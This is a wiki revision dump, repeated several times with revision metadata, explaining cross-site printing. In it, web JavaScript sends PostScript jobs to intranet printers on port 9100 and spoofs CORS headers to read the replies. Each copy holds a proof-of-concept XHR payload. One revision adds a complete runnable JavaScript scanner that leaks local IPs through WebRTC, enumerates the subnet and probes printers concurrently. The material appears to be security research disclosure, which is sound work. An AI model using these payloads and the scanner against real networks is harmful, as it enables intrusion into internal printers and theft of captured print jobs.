Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. 
Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]], [[BeEF]] ---- 268b9c72cabd2b36fbb5ea4bfe61f28660838a80 276 275 2017-01-28T16:46:26Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. 
In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. 
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. 
Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[Port 9100 printing]] ---- 1856652a3e1d8eb31e11bf514179420fc42ed159 275 274 2017-01-28T16:45:44Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. 
In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. 
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time.

If the printer device supports plain text printing, the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable: we do not gain control over the printer – and thereby, under some circumstances, the ability to disable printing functionality – until the HTTP body is processed, by which time the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]], using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all of these protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref>, they have some drawbacks beyond not providing feedback via spoofed CORS headers:

* Cross-protocol access to LPD and FTP ports is blocked by various web browsers
* Parameters for direct printing over the embedded web server are model-specific
* The IPP standard requires the <code>Content-Type</code> of HTTP POST requests to be set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref>, which a cross-origin XHR cannot set without triggering a CORS preflight request that the printer will not answer – it is however up to the implementation to actually care about incorrect types

A comparison of cross-site printing channels is given below:

{| class="wikitable" style="text-align:center"
|+ Comparison of cross-site printing channels
|-
! Method !! No feedback !! Unsolicited printouts !! Standardized !! Blocked by
|-
| Raw || || ✔ || ✔ ||
|-
| Web || ✔ || || ||
|-
| IPP || ✔ || || ✔ ||
|-
| LPD || ✔ || || ✔ || FF, Ch, Op
|-
| FTP || ✔ || || ✔ || FF, Ch, Op, IE
|}

(FF = Firefox, Ch = Chrome, Op = Opera, IE = Internet Explorer)

One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref>, which is implemented in most modern browsers and can enumerate the IP addresses of local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp of all 253 remaining addresses of the /24 subnet to retrieve the printer product name using PostScript and CORS spoofing, which only takes seconds in our tests. If the printer is on the same subnet as the victim's host, its address can thus be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: we try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan its subnet for printers as described before.

== Proof-of-concept ==

A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it routes connections to all addresses – including local ones – through the Tor network, meaning XSP requests never reach the intranet printer.

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]
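The printer discovery procedure described above (local address leaked through WebRTC, scan of the 253 neighbouring addresses on 9100/tcp, default router addresses as fallback), as an added example in JavaScript that is not part of the wiki or its proof-of-concept. The ICE candidate parsing, the /24 enumeration and the bounded-concurrency scan are runnable as-is; the probe and reachability checks are injected so the logic runs outside a browser, with <code>xhrProbe</code> showing what the browser-side probe looks like. Function names, the short router list (a stand-in for the wiki's 115 entries) and the sample ICE candidate lines are our own constructions. One caveat of our own: recent versions of the major browsers replace local ICE candidate addresses with mDNS hostnames ending in <code>.local</code>, in which case the WebRTC leak yields nothing and only the router fallback remains.

```javascript
// Added example, not the wiki's own code: locating the printer for XSP.
// ICE candidate parsing, /24 enumeration and the router fallback follow the
// procedure described in the text; probe and reachability check are injected
// so the scan logic runs without a browser.  All names and sample data here
// are our own.

// Extract IPv4 host addresses from ICE candidate lines.  Browsers that
// obfuscate local candidates put an mDNS name (...local) in the address
// field, which the dotted-quad pattern deliberately does not match.
function localIpsFromCandidates(candidateLines) {
  const ips = new Set();
  for (const line of candidateLines) {
    const m = line.match(/^candidate:\S+ \d+ \S+ \d+ (\d{1,3}(?:\.\d{1,3}){3}) \d+ typ host/);
    if (m && !m[1].startsWith("127.")) ips.add(m[1]);
  }
  return Array.from(ips);
}

// Browser only: gather ICE candidates for a throw-away peer connection and
// hand the parsed local addresses to `callback`.  Returns false under Node.
function leakLocalIps(callback) {
  if (typeof RTCPeerConnection === "undefined") return false;
  const pc = new RTCPeerConnection({ iceServers: [] });
  const lines = [];
  pc.createDataChannel("xsp");
  pc.onicecandidate = (e) => {
    if (e.candidate) lines.push(e.candidate.candidate);
    else { pc.close(); callback(localIpsFromCandidates(lines)); }
  };
  pc.createOffer().then((offer) => pc.setLocalDescription(offer));
  return true;
}

// The 253 other host addresses of the /24 around `ip` (network and
// broadcast address excluded).
function subnetCandidates(ip) {
  const octets = ip.split(".").map(Number);
  const prefix = octets.slice(0, 3).join(".");
  const out = [];
  for (let h = 1; h <= 254; h++) if (h !== octets[3]) out.push(prefix + "." + h);
  return out;
}

// Constructed stand-in for the wiki's list of 115 default router addresses.
const DEFAULT_ROUTERS = ["192.168.0.1", "192.168.1.1", "192.168.1.254",
                         "192.168.2.1", "10.0.0.1", "172.16.0.1"];

// Browser only: one probe = one XHR carrying a spoofed-CORS PostScript job
// (e.g. one returning `product`) to http://addr:9100; resolves to the
// response text, or null on error or timeout.
function xhrProbe(addr, job, timeoutMs) {
  return new Promise((resolve) => {
    if (typeof XMLHttpRequest === "undefined") return resolve(null);
    const x = new XMLHttpRequest();
    x.timeout = timeoutMs || 1500;
    x.onload = () => resolve(x.responseText.trim() || null);
    x.onerror = x.ontimeout = () => resolve(null);
    x.open("POST", "http://" + addr + ":9100");
    x.send(job);
  });
}

// Scan addresses with bounded concurrency; `probe(addr)` resolves to the
// printer's product string or null.  Returns { addr: product }.
async function scanSubnet(addresses, probe, concurrency) {
  const found = {};
  let next = 0;
  async function worker() {
    while (next < addresses.length) {
      const addr = addresses[next++];
      const product = await probe(addr);
      if (product) found[addr] = product;
    }
  }
  await Promise.all(Array.from({ length: concurrency || 32 }, worker));
  return found;
}

// The full procedure: subnets of leaked local addresses first; if nothing
// leaked, the subnet of every default router that answers on port 80
// (`reachable(addr)` resolves to true/false, e.g. an XHR to http://addr/).
async function findPrinters(localIps, probe, reachable) {
  let targets = [];
  for (const ip of localIps) targets = targets.concat(subnetCandidates(ip));
  if (targets.length === 0) {
    for (const r of DEFAULT_ROUTERS) {
      if (await reachable(r)) targets = targets.concat(subnetCandidates(r));
    }
  }
  return scanSubnet(targets, probe);
}
```

In a browser the pieces plug together as <code>leakLocalIps(ips => findPrinters(ips, a => xhrProbe(a, job), a => xhrProbe(a, "") !== null))</code> with <code>job</code> being a spoofed-CORS PostScript job that returns <code>product</code>; the 32-way concurrency is what keeps a /24 sweep in the range of seconds while staying below typical per-host connection limits.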
In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. 
A schematic overview of the attack is given below: [[File:Cross-site-printing.png|900px|Advanced cross-site printing with CORS spoofing]] In such an enhanced variant of XSP – combined with CORS spoofing – a web attacker has full access to the HTTP response which allows her to extract arbitrary information like captured print jobs from the printer device. A proof-of-concept JavaScript snipplet is shown below: <syntaxhighlight lang=postscript> job = "\x1B%-12345X\r\n" + "%!\r\n" + "(HTTP/1.0 200 OK\\n) print\r\n" + "(Server: PostScript HTTPD\\n) print\r\n" + "(Access-Control-Allow-Origin: *\\n) print\r\n" + "(Connection: close\\n) print\r\n" + "(Content-Length: ) print\r\n" + "product dup length dup string cvs print\r\n" + "(\\n\\n) print\r\n" + "print\r\n" + "(\\n) print flush\r\n" + "\x1B%-12345X\r\n"; var x = new XMLHttpRequest(); x.open("POST", "http://printer:9100"); x.send(job); x.onreadystatechange = function() { if (x.readyState == 4) alert(x.responseText); }; </syntaxhighlight> == Limitations of cross-site printing == Note that [[PCL]] as page description language is not applicable for CORS spoofing because it only allows one single number to be echoed. [[PJL]] likewise cannot be used because unfortunately it prepends <code>@PJL ECHO</code> to all echoed strings, which makes it impossible to simulate a valid HTTP header. This however does not mean that enhanced XSP attacks are limited to [[PostScript]] jobs: PostScript can be used to respond with a spoofed HTTP header and the [[UEL]] can further be invoked to switch the printer language. This way a web attacker can also obtain the results for PJL commands. Two implementation pitfalls exist which deserve to be mentioned: First, a correct <code>Content-Length</code> for the data to be responded needs determined with PostScript. If the attacker cannot predict the overall size of the response and chunked encoding as well is not an option, she needs to set a very high value and use padding. 
Second, adding the <code>Connection: close</code> header field is important, otherwise HTTP/1.1 connections are kept alive until either the web client or the printer device triggers a timeout, which means the printer will not be accessible for some time. If the printer device supports plain text printing the HTTP request header of the XHR is printed out as hard copy – including the <code>Origin</code> header field containing the URL that invoked the malicious JavaScript, thus making it hard for an attacker to stay silent. This is unavoidable, as we do not gain control over the printer – and under some circumstances can disable printing functionality – until the HTTP body is processed and the HTTP header has already been interpreted as plain text by the printer device. If reducing noise is a priority, the attacker can however try to first disable printing functionality with proprietary PJL commands as proposed in [[Document processing#PJL_jobmedia|PJL jobmedia]] using other potential XSP channels like IPP, LPD, FTP or the printer's embedded web server. While all protocols could successfully be tested to deploy print jobs using variants of cross-protocol scripting as described by <ref>''[http://www.remote.org/jochen/sec/hfpa/hfpa.pdf The HTML Form Protocol Attack]'', J. Topf, BugTraq posting, 2001</ref> and <ref>''[https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf Inter-Protocol Exploitation]'', W. 
Alcorn, NGSSoftware Insight Security Research (NISR), 2007</ref> they have some drawbacks beyond not providing feedback using spoofed CORS headers: * Cross-protocol access to LPD and FTP ports is blocked by various web browsers * Parameters for direct printing over the embedded web server are model-specific * The IPP standard requires the <code>Content-type</code> for HTTP POST requests being set to <code>application/ipp</code> <ref>''[https://tools.ietf.org/html/rfc2910 RFC2910 – Internet Printing Protocol/1.1: Encoding and Transport]'', R. Herriot, 2000</ref> which cannot be done with XHR objects – it is however up to the implementation to actually care about incorrect types A comparison of cross-site printing channels is given in below: {| class="wikitable" style="text-align:center" |+ Comparison of cross-site printing channels |- ! Method !! No Feedback !! Unsolicited printouts !! Standardized !! Blocked by |- | Raw || || ✔ || ✔ || |- | Web || ✔ || || || |- | IPP || ✔ || || ✔ || |- | LPD || ✔ || || ✔ || FF, Ch, Op |- | FTP || ✔ || || ✔ || FF, Ch, Op, IE |- |} One major problem of XSP is to find out the correct address or hostname of the printer. Our approach is to abuse WebRTC <ref>''[https://www.w3.org/TR/webrtc/ WebRTC 1.0: Real-time Communication Between Browsers]'', D. Bergkvist and D. Burnett and C. Jennings, W3C, Working Draft, 2014</ref> which is implemented in most modern browsers and has the feature to enumerate IP addresses for local network interfaces. Given the local IP address, XHR objects are further used to open connections to port 9100/tcp for all 253 remaining addresses to retrieve the printer product name using PostScript and CORS spoofing which only takes seconds in our tests. If the printer is on the same subnet as the victim's host its address can be detected solely using JavaScript. WebRTC is in development for Safari and supported by current versions of Firefox, Chrome and Microsoft Edge. 
Internet Explorer has no WebRTC support, but VBScript and Java can likewise be used to leak the local IP address. If the address of the local interface cannot be retrieved, we apply an intelligent brute-force approach: We try to connect to port 80 of the victim's router using XHR objects. For this, a list of 115 default router addresses from various Internet-accessible resources was compiled. If a router is accessible, we scan the subnet for printers as described before. == Proof-of-concept == A proof-of-concept implementation demonstrating that advanced cross-site printing attacks are practical and a real-world threat to companies and institutions is available at [http://hacking-printers.net/xsp/ hacking-printers.net/xsp/]. It was successfully tested on Firefox 48, Chrome 52, Opera 39 and Internet Explorer 10. It is worth noting that the [https://torproject.org/projects/torbrowser.html.en Tor Browser] blocks the attack because it tries to connect to all addresses – including local ones – through the Tor network meaning XSP requests never reach the intranet printer. → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 16c7182dd761ef4b5b08a295dd82c236d80f3806 273 266 2017-01-28T16:45:21Z Admin 1 wikitext text/x-wiki Cross-site printing (XSP) attacks empower a web attacker to access the printer device as demonstrated by <ref>''[http://helpnetsecurity.com/dl/articles/CrossSitePrinting.pdf Cross Site Printing]'', A. Weaver, 2007</ref> who use a hidden Iframe to send HTTP POST requests to port 9100/tcp of a printer within the victim's internal network. The HTTP header is either printed as plain text or discarded based on the printer's settings. The POST data however can contain arbitrary print jobs like [[PostScript]] or [[PJL]] commands to be interpreted. 
In the following, the idea of cross-site printing is adapted and improved which enables a web attacker to perform most attacks described in wiki obtaining captured print jobs, using the victim's web browser acts as a carrier. [[File:XSP-deployment-channel.png|420px|Deployment of (potentially malicious) print jobs with XSP]] == Enhanced cross-site printing == Instead of Iframes, we use XMLHttpRequest (XHR) JavaScript objects as defined in <ref>''[https://www.w3.org/TR/XMLHttpRequest/ The XMLHttpRequest Object]'', A. van Kesteren and D. Jackson, W3C, Working Draft, 2007</ref> to perform HTTP POST requests to internal printers. A limitation of the cross-site printing approach discussed so far is that data can only be send to the device, not received because of the same-origin policy <ref>''[https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy The Same Origin Policy]'', J. Ruderman, 2001</ref>. This opts out all information disclosure attacks. To bend the restrictions of the same-origin policy, cross-origin resource sharing (CORS) <ref>''[https://www.w3.org/TR/cors/ Cross-Origin Resource Sharing]'', A. van Kesteren and others, W3C, Working Draft, 2010</ref> can be used – if the web server explicitly allows it by sending a special HTTP header field. In the scenario of cross-site printing, however, we have full control of what the requested ‘web server’ – which actually is a printer [https://en.wikipedia.org/wiki/Raster_image_processor RIP] accessed over port 9100/tcp – sends back to the browser. By using PostScript output commands we can simply emulate an HTTP server running on port 9100/tcp and define our own HTTP header to be responded – including arbitrary CORS <code>Access-Control-Allow-Origin</code> fields which instruct the web browser to allow JavaScript access to this resource and therefore punch a whole into the same-origin policy. 
